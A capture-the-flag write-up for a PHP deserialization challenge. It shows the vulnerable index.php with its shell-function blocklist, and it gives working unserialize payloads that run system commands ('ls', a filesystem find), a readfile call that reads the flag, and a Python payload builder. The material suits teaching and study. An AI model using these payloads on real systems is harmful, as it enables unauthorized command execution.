BUUCTF: [网鼎杯 2020 朱雀组]phpweb ------- deserialization
Challenge
Warning: date(): It is not safe to rely on the system's timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24
2021-06-25 09:41:34 am
When I first captured the request with BurpSuite, I thought it was SQL injection, and for a good while I could not get anywhere with it. Then I read other people's write-ups and found it was nothing of the sort...
The first step is to read index.php with file_get_contents. The page passes the func and p parameters straight to call_user_func and echoes the result whenever it is a string, and the file contents are a string, so the source comes straight back.
Payload: func=file_get_contents&p=index.php
```php
<?php
// Request-level blocklist for $func. Note the challenge's own typo
// "registregister_shutdown_function": register_shutdown_function itself is not on the list.
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
// Calls $func($p) and returns the result only when it is a string;
// any other return type (e.g. the object produced by unserialize()) yields "".
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    // Runs when the object is destroyed; $this->func is never checked against $disable_fun.
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);   // only the request-level func is lowercased and filtered
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>
```
OK, so this is a deserialization challenge.
The thing to notice is that there are two func values: the one taken from the request is lowercased and checked against the blocklist, but the $func property of Test, which __destruct() passes to gettime(), is never checked at all.
if (!in_array($func,$disable_fun))
We first want system('ls') to see what is in the current directory, but system is on the blocklist for the request-level $func. unserialize, however, is not. If p is a serialized Test object, call_user_func('unserialize', $p) builds it; gettype() returns "object", so gettime() returns "" and nothing is echoed at that point. When the object is destroyed at the end of the request, __destruct() calls gettime($this->func, $this->p) with whatever func and p we put in the object, and no blocklist is applied.
Payload: func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:2:"ls";}
That lists the files in the current directory.
Next, search for the flag file:
Payload: func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:19:"find / -name *flag*";}
Two things to check when crafting this: the s:N prefixes are byte lengths, so they must be recounted for every command (19 is the length of find / -name *flag*), and the p value has to be URL-encoded when sent so that the quotes, braces, semicolons, spaces and * survive the query string intact. The *flag* glob is unquoted, so the shell will expand it against the current directory first if anything there matches; quoting it as '*flag*' avoids that.
Note that this runs slowly, because searching the whole filesystem for flag-related files takes a long time. (At first I thought I had written the payload wrong.)
There is also a second way to read the flag once the find command has revealed its path: func=readfile&p=/tmp/flagoefiu4r93
This works because readfile is not on the request-level blocklist, so it can be called directly through gettime() without going through the Test object at all; readfile() prints the file and returns the byte count, which is an integer, so the flag is printed by readfile itself rather than by the echo.
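To avoid miscounting the s:N length prefixes by hand, the following Python script builds the serialized Test object for any command and URL-encodes the request, and it also models the challenge's request-level gate (strtolower + in_array) to show why the unserialize and readfile routes pass while system does not. This is an added example written for this write-up, not code from the challenge; the function names serialize_test, is_blocked, unserialize_request and direct_request are my own, and the blocklist is copied from the index.php source shown above.

```python
"""Payload builder for the phpweb challenge (added example, not part of the challenge).

PHP's serialize() writes strings as s:<byte length>:"<raw bytes>"; with no escaping,
so the only thing that can go wrong by hand is the length. PHP counts bytes, not
characters, which matters as soon as a command contains non-ASCII text.
"""
from urllib.parse import urlencode

# Copied from the challenge's index.php, including its own typo
# "registregister_shutdown_function".
DISABLE_FUN = [
    "exec", "shell_exec", "system", "passthru", "proc_open", "show_source",
    "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch",
    "escapeshellcmd", "escapeshellarg", "assert", "substr_replace",
    "call_user_func_array", "call_user_func", "array_filter", "array_walk",
    "array_map", "registregister_shutdown_function", "register_tick_function",
    "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",
    "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite",
    "file_put_contents",
]


def php_str(s: str) -> str:
    """Serialize one PHP string: s:<byte length>:"<raw>";"""
    return f's:{len(s.encode("utf-8"))}:"{s}";'


def serialize_test(func: str, p: str) -> str:
    """Serialize a Test object whose __destruct() will run gettime(func, p).

    Property order matches the class definition in index.php (p first there, but
    PHP does not care about order on unserialize, so func is written first as in
    the write-up's payload).
    """
    body = php_str("func") + php_str(func) + php_str("p") + php_str(p)
    return f'O:4:"Test":2:{{{body}}}'


def is_blocked(func: str) -> bool:
    """Model of the request-level gate: strtolower($func), then in_array().

    PHP's strtolower is ASCII-only (PHP 8), which equals str.lower() for the
    ASCII function names involved here.
    """
    return func.lower() in DISABLE_FUN


def unserialize_request(cmd: str, func: str = "system") -> str:
    """Query string for the deserialization route: func=unserialize&p=<Test>."""
    if is_blocked("unserialize"):
        raise ValueError("unserialize is on the blocklist; this route would not work")
    # urlencode() percent-encodes the quotes, braces, ';' and '*' in the payload.
    return urlencode({"func": "unserialize", "p": serialize_test(func, cmd)})


def direct_request(func: str, p: str) -> str:
    """Query string for calling an unblocked function directly, e.g. readfile."""
    if is_blocked(func):
        raise ValueError(f"{func} is blocked at request level; wrap it in a Test object")
    return urlencode({"func": func, "p": p})


if __name__ == "__main__":
    print(serialize_test("system", "ls"))
    print(unserialize_request("find / -name '*flag*'"))
    # Path below is the one the find command revealed in the write-up.
    print(direct_request("readfile", "/tmp/flagoefiu4r93"))
```

Send the printed query string as the body of a POST (or append it to the URL); because index.php reads $_REQUEST, either works.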